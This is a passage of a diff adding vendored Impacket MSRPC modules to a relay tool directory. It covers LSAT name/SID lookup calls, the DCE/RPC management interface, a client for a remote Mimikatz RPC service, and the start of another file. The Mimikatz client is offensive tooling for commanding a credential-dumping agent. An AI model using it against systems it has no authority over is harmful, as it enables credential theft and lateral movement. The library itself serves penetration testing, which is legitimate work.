+from impacket.dcerpc.v5.dtypes import ULONG, LONG, PRPC_SID, RPC_UNICODE_STRING, LPWSTR, PRPC_UNICODE_STRING, NTSTATUS, \
+    NULL
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.lsad import LSAPR_HANDLE, PLSAPR_TRUST_INFORMATION_ARRAY
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRENUM, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.samr import SID_NAME_USE
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_LSAT  = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] 
+            return 'LSAT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'LSAT SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.10 ACCESS_MASK
+POLICY_LOOKUP_NAMES             = 0x00000800
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.12 LSAPR_REFERENCED_DOMAIN_LIST
+class LSAPR_REFERENCED_DOMAIN_LIST(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Domains', PLSAPR_TRUST_INFORMATION_ARRAY),
+        ('MaxEntries', ULONG),
+    )
+
+class PLSAPR_REFERENCED_DOMAIN_LIST(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_REFERENCED_DOMAIN_LIST),
+    )
+
+# 2.2.14 LSA_TRANSLATED_SID
+class LSA_TRANSLATED_SID(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('RelativeId', ULONG),
+        ('DomainIndex', LONG),
+    )
+
+# 2.2.15 LSAPR_TRANSLATED_SIDS
+class LSA_TRANSLATED_SID_ARRAY(NDRUniConformantArray):
+    item = LSA_TRANSLATED_SID
+
+class PLSA_TRANSLATED_SID_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSA_TRANSLATED_SID_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_SIDS(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Sids', PLSA_TRANSLATED_SID_ARRAY),
+    )
+
+# 2.2.16 LSAP_LOOKUP_LEVEL
+class LSAP_LOOKUP_LEVEL(NDRENUM):
+    class enumItems(Enum):
+        LsapLookupWksta                = 1
+        LsapLookupPDC                  = 2
+        LsapLookupTDL                  = 3
+        LsapLookupGC                   = 4
+        LsapLookupXForestReferral      = 5
+        LsapLookupXForestResolve       = 6
+        LsapLookupRODCReferralToFullDC = 7
+
+# 2.2.17 LSAPR_SID_INFORMATION
+class LSAPR_SID_INFORMATION(NDRSTRUCT):
+    structure = (
+        ('Sid', PRPC_SID),
+    )
+
+# 2.2.18 LSAPR_SID_ENUM_BUFFER
+class LSAPR_SID_INFORMATION_ARRAY(NDRUniConformantArray):
+    item = LSAPR_SID_INFORMATION
+
+class PLSAPR_SID_INFORMATION_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_SID_INFORMATION_ARRAY),
+    )
+
+class LSAPR_SID_ENUM_BUFFER(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('SidInfo', PLSAPR_SID_INFORMATION_ARRAY),
+    )
+
+# 2.2.19 LSAPR_TRANSLATED_NAME
+class LSAPR_TRANSLATED_NAME(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('Name', RPC_UNICODE_STRING),
+        ('DomainIndex', LONG),
+    )
+
+# 2.2.20 LSAPR_TRANSLATED_NAMES
+class LSAPR_TRANSLATED_NAME_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_NAME
+
+class PLSAPR_TRANSLATED_NAME_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_NAME_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_NAMES(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Names', PLSAPR_TRANSLATED_NAME_ARRAY),
+    )
+
+# 2.2.21 LSAPR_TRANSLATED_NAME_EX
+class LSAPR_TRANSLATED_NAME_EX(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('Name', RPC_UNICODE_STRING),
+        ('DomainIndex', LONG),
+        ('Flags', ULONG),
+    )
+
+# 2.2.22 LSAPR_TRANSLATED_NAMES_EX
+class LSAPR_TRANSLATED_NAME_EX_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_NAME_EX
+
+class PLSAPR_TRANSLATED_NAME_EX_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_NAME_EX_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_NAMES_EX(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Names', PLSAPR_TRANSLATED_NAME_EX_ARRAY),
+    )
+
+# 2.2.23 LSAPR_TRANSLATED_SID_EX
+class LSAPR_TRANSLATED_SID_EX(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('RelativeId', ULONG),
+        ('DomainIndex', LONG),
+        ('Flags', ULONG),
+    )
+
+# 2.2.24 LSAPR_TRANSLATED_SIDS_EX
+class LSAPR_TRANSLATED_SID_EX_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_SID_EX
+
+class PLSAPR_TRANSLATED_SID_EX_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_SID_EX_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_SIDS_EX(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Sids', PLSAPR_TRANSLATED_SID_EX_ARRAY),
+    )
+
+# 2.2.25 LSAPR_TRANSLATED_SID_EX2
+class LSAPR_TRANSLATED_SID_EX2(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('Sid', PRPC_SID),
+        ('DomainIndex', LONG),
+        ('Flags', ULONG),
+    )
+
+# 2.2.26 LSAPR_TRANSLATED_SIDS_EX2
+class LSAPR_TRANSLATED_SID_EX2_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_SID_EX2
+
+class PLSAPR_TRANSLATED_SID_EX2_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_SID_EX2_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_SIDS_EX2(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Sids', PLSAPR_TRANSLATED_SID_EX2_ARRAY),
+    )
+
+class RPC_UNICODE_STRING_ARRAY(NDRUniConformantArray):
+    item = RPC_UNICODE_STRING
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.4 LsarGetUserName (Opnum 45)
+class LsarGetUserName(NDRCALL):
+    opnum = 45
+    structure = (
+       ('SystemName', LPWSTR),
+       ('UserName', PRPC_UNICODE_STRING),
+       ('DomainName', PRPC_UNICODE_STRING),
+    )
+
+class LsarGetUserNameResponse(NDRCALL):
+    structure = (
+       ('UserName', PRPC_UNICODE_STRING),
+       ('DomainName', PRPC_UNICODE_STRING),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.5 LsarLookupNames4 (Opnum 77)
+class LsarLookupNames4(NDRCALL):
+    opnum = 77
+    structure = (
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupNames4Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.6 LsarLookupNames3 (Opnum 68)
+class LsarLookupNames3(NDRCALL):
+    opnum = 68
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupNames3Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.7 LsarLookupNames2 (Opnum 58)
+class LsarLookupNames2(NDRCALL):
+    opnum = 58
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupNames2Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.8 LsarLookupNames (Opnum 14)
+class LsarLookupNames(NDRCALL):
+    opnum = 14
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+    )
+
+class LsarLookupNamesResponse(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.9 LsarLookupSids3 (Opnum 76)
+class LsarLookupSids3(NDRCALL):
+    opnum = 76
+    structure = (
+       ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupSids3Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.10 LsarLookupSids2 (Opnum 57)
+class LsarLookupSids2(NDRCALL):
+    opnum = 57
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupSids2Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.11 LsarLookupSids (Opnum 15)
+class LsarLookupSids(NDRCALL):
+    opnum = 15
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+    )
+
+class LsarLookupSidsResponse(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 14 : (LsarLookupNames, LsarLookupNamesResponse),
+ 15 : (LsarLookupSids, LsarLookupSidsResponse),
+ 45 : (LsarGetUserName, LsarGetUserNameResponse),
+ 57 : (LsarLookupSids2, LsarLookupSids2Response),
+ 58 : (LsarLookupNames2, LsarLookupNames2Response),
+ 68 : (LsarLookupNames3, LsarLookupNames3Response),
+ 76 : (LsarLookupSids3, LsarLookupSids3Response),
+ 77 : (LsarLookupNames4, LsarLookupNames4Response),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hLsarGetUserName(dce, userName = NULL, domainName = NULL):
+    request = LsarGetUserName()
+    request['SystemName'] = NULL
+    request['UserName'] = userName
+    request['DomainName'] = domainName
+    return dce.request(request)
+
+def hLsarLookupNames4(dce, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupNames4()
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupNames3(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupNames3()
+    request['PolicyHandle'] = policyHandle
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupNames2(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupNames2()
+    request['PolicyHandle'] = policyHandle
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupNames(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta):
+    request = LsarLookupNames()
+    request['PolicyHandle'] = policyHandle
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+
+    return dce.request(request)
+
+def hLsarLookupSids2(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupSids2()
+    request['PolicyHandle'] = policyHandle
+    request['SidEnumBuffer']['Entries'] = len(sids)
+    for sid in sids:
+        itemn = LSAPR_SID_INFORMATION()
+        itemn['Sid'].fromCanonical(sid)
+        request['SidEnumBuffer']['SidInfo'].append(itemn)
+
+    request['TranslatedNames']['Names'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupSids(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta):
+    request = LsarLookupSids()
+    request['PolicyHandle'] = policyHandle
+    request['SidEnumBuffer']['Entries'] = len(sids)
+    for sid in sids:
+        itemn = LSAPR_SID_INFORMATION()
+        itemn['Sid'].fromCanonical(sid)
+        request['SidEnumBuffer']['SidInfo'].append(itemn)
+
+    request['TranslatedNames']['Names'] = NULL
+    request['LookupLevel'] = lookupLevel
+
+    return dce.request(request)
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mgmt.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mgmt.py
@@ -0,0 +1,166 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [C706] Remote Management Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRUniConformantVaryingArray
+from impacket.dcerpc.v5.epm import PRPC_IF_ID
+from impacket.dcerpc.v5.dtypes import ULONG, DWORD_ARRAY, ULONGLONG
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+from impacket import nt_errors
+
+MSRPC_UUID_MGMT  = uuidtup_to_bin(('afa8bd80-7d8a-11c9-bef4-08002b102989','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] 
+            return 'MGMT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'MGMT SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+class rpc_if_id_p_t_array(NDRUniConformantArray):
+    item = PRPC_IF_ID
+
+class rpc_if_id_vector_t(NDRSTRUCT):
+    structure = (
+        ('count',ULONG),
+        ('if_id',rpc_if_id_p_t_array),
+    )
+    structure64 = (
+        ('count',ULONGLONG),
+        ('if_id',rpc_if_id_p_t_array),
+    )
+
+class rpc_if_id_vector_p_t(NDRPOINTER):
+    referent = (
+        ('Data', rpc_if_id_vector_t),
+    )
+
+error_status = ULONG
+################################################################################
+# STRUCTURES
+################################################################################
+
+################################################################################
+# RPC CALLS
+################################################################################
+class inq_if_ids(NDRCALL):
+    opnum = 0
+    structure = (
+    )
+
+class inq_if_idsResponse(NDRCALL):
+    structure = (
+       ('if_id_vector', rpc_if_id_vector_p_t),
+       ('status', error_status),
+    )
+
+class inq_stats(NDRCALL):
+    opnum = 1
+    structure = (
+       ('count', ULONG),
+    )
+
+class inq_statsResponse(NDRCALL):
+    structure = (
+       ('count', ULONG),
+       ('statistics', DWORD_ARRAY),
+       ('status', error_status),
+    )
+
+class is_server_listening(NDRCALL):
+    opnum = 2
+    structure = (
+    )
+
+class is_server_listeningResponse(NDRCALL):
+    structure = (
+       ('status', error_status),
+    )
+
+class stop_server_listening(NDRCALL):
+    opnum = 3
+    structure = (
+    )
+
+class stop_server_listeningResponse(NDRCALL):
+    structure = (
+       ('status', error_status),
+    )
+
+class inq_princ_name(NDRCALL):
+    opnum = 4
+    structure = (
+       ('authn_proto', ULONG),
+       ('princ_name_size', ULONG),
+    )
+
+class inq_princ_nameResponse(NDRCALL):
+    structure = (
+       ('princ_name', NDRUniConformantVaryingArray),
+       ('status', error_status),
+    )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (inq_if_ids, inq_if_idsResponse),
+ 1 : (inq_stats, inq_statsResponse),
+ 2 : (is_server_listening, is_server_listeningResponse),
+ 3 : (stop_server_listening, stop_server_listeningResponse),
+ 4 : (inq_princ_name, inq_princ_nameResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hinq_if_ids(dce):
+    request = inq_if_ids()
+    return dce.request(request)
+
+def hinq_stats(dce, count = 4):
+    request = inq_stats()
+    request['count'] = count
+    return dce.request(request)
+
+def his_server_listening(dce):
+    request = is_server_listening()
+    return dce.request(request, checkError=False)
+
+def hstop_server_listening(dce):
+    request = stop_server_listening()
+    return dce.request(request)
+
+def hinq_princ_name(dce, authn_proto=0, princ_name_size=1):
+    request = inq_princ_name()
+    request['authn_proto'] = authn_proto
+    request['princ_name_size'] = princ_name_size
+    return dce.request(request, checkError=False)
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mimilib.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mimilib.py
@@ -0,0 +1,236 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   Mimikatz Interface implementation, based on @gentilkiwi IDL
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from __future__ import division
+from __future__ import print_function
+import binascii
+import random
+
+from impacket import nt_errors
+from impacket.dcerpc.v5.dtypes import DWORD, ULONG
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+from impacket.structure import Structure
+
+MSRPC_UUID_MIMIKATZ   = uuidtup_to_bin(('17FC11E9-C258-4B8D-8D07-2F4125156244', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] 
+            return 'Mimikatz SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'Mimikatz SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+CALG_DH_EPHEM = 0x0000aa02
+TPUBLICKEYBLOB = 0x6
+CUR_BLOB_VERSION = 0x2
+ALG_ID = DWORD
+CALG_RC4 = 0x6801
+
+################################################################################
+# STRUCTURES
+################################################################################
+class PUBLICKEYSTRUC(Structure):
+    structure = (
+        ('bType','B=0'),
+        ('bVersion','B=0'),
+        ('reserved','<H=0'),
+        ('aiKeyAlg','<L=0'),
+    )
+    def __init__(self, data = None, alignment = 0):
+        Structure.__init__(self,data,alignment)
+        self['bType'] = TPUBLICKEYBLOB
+        self['bVersion'] = CUR_BLOB_VERSION
+        self['aiKeyAlg'] = CALG_DH_EPHEM
+
+class DHPUBKEY(Structure):
+    structure = (
+        ('magic','<L=0'),
+        ('bitlen','<L=0'),
+    )
+    def __init__(self, data = None, alignment = 0):
+        Structure.__init__(self,data,alignment)
+        self['magic'] = 0x31484400
+        self['bitlen'] = 1024
+
+class PUBLICKEYBLOB(Structure):
+    structure = (
+        ('publickeystruc',':', PUBLICKEYSTRUC),
+        ('dhpubkey',':', DHPUBKEY),
+        ('yLen', '_-y','128'),
+        ('y',':'),
+    )
+    def __init__(self, data = None, alignment = 0):
+        Structure.__init__(self,data,alignment)
+        self['publickeystruc'] = PUBLICKEYSTRUC().getData()
+        self['dhpubkey'] = DHPUBKEY().getData()
+
+class MIMI_HANDLE(NDRSTRUCT):
+    structure =  (
+        ('Data','20s=""'),
+    )
+    def getAlignment(self):
+        if self._isNDR64 is True:
+            return 8
+        else:
+            return 4
+
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',BYTE_ARRAY),
+    )
+
+class MIMI_PUBLICKEY(NDRSTRUCT):
+    structure =  (
+        ('sessionType',ALG_ID),
+        ('cbPublicKey',DWORD),
+        ('pbPublicKey',PBYTE_ARRAY),
+    )
+
+class PMIMI_PUBLICKEY(NDRPOINTER):
+    referent = (
+        ('Data',MIMI_PUBLICKEY),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+class MimiBind(NDRCALL):
+    opnum = 0
+    structure = (
+       ('clientPublicKey',MIMI_PUBLICKEY),
+    )
+
+class MimiBindResponse(NDRCALL):
+    structure = (
+       ('serverPublicKey',MIMI_PUBLICKEY),
+       ('phMimi',MIMI_HANDLE),
+       ('ErrorCode',ULONG),
+    )
+
+class MimiUnbind(NDRCALL):
+    opnum = 1
+    structure = (
+       ('phMimi',MIMI_HANDLE),
+    )
+
+class MimiUnbindResponse(NDRCALL):
+    structure = (
+       ('phMimi',MIMI_HANDLE),
+       ('ErrorCode',ULONG),
+    )
+
+class MimiCommand(NDRCALL):
+    opnum = 2
+    structure = (
+        ('phMimi',MIMI_HANDLE),
+        ('szEncCommand',DWORD),
+        ('encCommand',PBYTE_ARRAY),
+    )
+
+class MimiCommandResponse(NDRCALL):
+    structure = (
+       ('szEncResult',DWORD),
+       ('encResult',PBYTE_ARRAY),
+       ('ErrorCode',ULONG),
+    )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (MimiBind, MimiBindResponse),
+ 1 : (MimiUnbind, MimiUnbindResponse),
+ 2 : (MimiCommand, MimiCommandResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+
+class MimiDiffeH:
+    def __init__(self):
+        self.G = 2
+        self.P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
+        self.privateKey = random.getrandbits(1024)
+        #self.privateKey = int('A'*128, base=16)
+
+    def genPublicKey(self):
+        self.publicKey = pow(self.G, self.privateKey, self.P)
+        tmp = hex(self.publicKey)[2:].rstrip('L')
+        if len(tmp) & 1:
+            tmp = '0' + tmp
+        return binascii.unhexlify(tmp)
+
+    def getSharedSecret(self, serverPublicKey):
+        pubKey = int(binascii.hexlify(serverPublicKey), base=16)
+        self.sharedSecret = pow(pubKey, self.privateKey, self.P)
+        tmp = hex(self.sharedSecret)[2:].rstrip('L')
+        if len(tmp) & 1:
+            tmp = '0' + tmp
+        return binascii.unhexlify(tmp)
+
+
+def hMimiBind(dce, clientPublicKey):
+    request = MimiBind()
+    request['clientPublicKey'] = clientPublicKey
+    return dce.request(request)
+
+def hMimiCommand(dce, phMimi, encCommand):
+    request = MimiCommand()
+    request['phMimi'] = phMimi
+    request['szEncCommand'] = len(encCommand)
+    request['encCommand'] = list(encCommand)
+    return dce.request(request)
+
+if __name__ == '__main__':
+    from impacket.winregistry import hexdump
+    alice = MimiDiffeH()
+    alice.G = 5
+    alice.P = 23
+    alice.privateKey = 6
+
+    bob = MimiDiffeH()
+    bob.G = 5
+    bob.P = 23
+    bob.privateKey = 15
+
+    print('Alice pubKey')
+    hexdump(alice.genPublicKey())
+    print('Bob pubKey')
+    hexdump(bob.genPublicKey())
+
+    print('Secret')
+    hexdump(alice.getSharedSecret(bob.genPublicKey()))
+    hexdump(bob.getSharedSecret(alice.genPublicKey()))
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/ndr.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/ndr.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/nrpc.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/nrpc.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/nspi.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/nspi.py
--- a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/oxabref.py
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/oxabref.py
@@ -0,0 +1,131 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
